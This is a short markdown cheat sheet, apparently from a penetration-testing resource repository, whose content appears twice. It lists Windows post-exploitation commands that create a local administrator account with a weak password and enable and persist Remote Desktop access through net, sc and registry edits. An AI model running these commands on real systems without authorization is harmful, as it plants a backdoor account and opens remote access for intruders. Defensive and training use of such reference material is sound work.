cyber-security-resources/post_exploitation/misc-windows-post-exploitation.md

# Misc Windows Post Exploitation Tasks

### Adding a Windows User (joker):
```
net user /add joker password123
```

### Adding a user to the Administrators groups
```
net localgroup administrators /add joker
```

### Adding a user to the Remote Desktop user group
```
net localgroup "Remote Desktop users" hacker /add
```

### Starting the Remote Desktop service
```
net start TermService
```

### Verifying if the Remote Desktop Service is active and running
```
tasklist /svc | findstr /C:TermService
```

### Permanently enable Terminal Services
```
sc config TermService start=auto
```

### Enabling Terminal services via the registry  
Note: You need to reboot after invoking this...
```
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
```
Create misc-windows-post-exploitation.md 2021-07-19 03:33:45 +00:00			`# Misc Windows Post Exploitation Tasks`

			`### Adding a Windows User (joker):`
			```
			`net user /add joker password123`
			```

			`### Adding a user to the Administrators groups`
			```
			`net localgroup administrators /add joker`
			```

			`### Adding a user to the Remote Desktop user group`
			```
			`net localgroup "Remote Desktop users" hacker /add`
			```

			`### Starting the Remote Desktop service`
			```
			`net start TermService`
			```

			`### Verifying if the Remote Desktop Service is active and running`
			```
			`tasklist /svc \| findstr /C:TermService`
			```

			`### Permanently enable Terminal Services`
			```
			`sc config TermService start=auto`
			```

			`### Enabling Terminal services via the registry`
			`Note: You need to reboot after invoking this...`
			```
			`reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f`
			```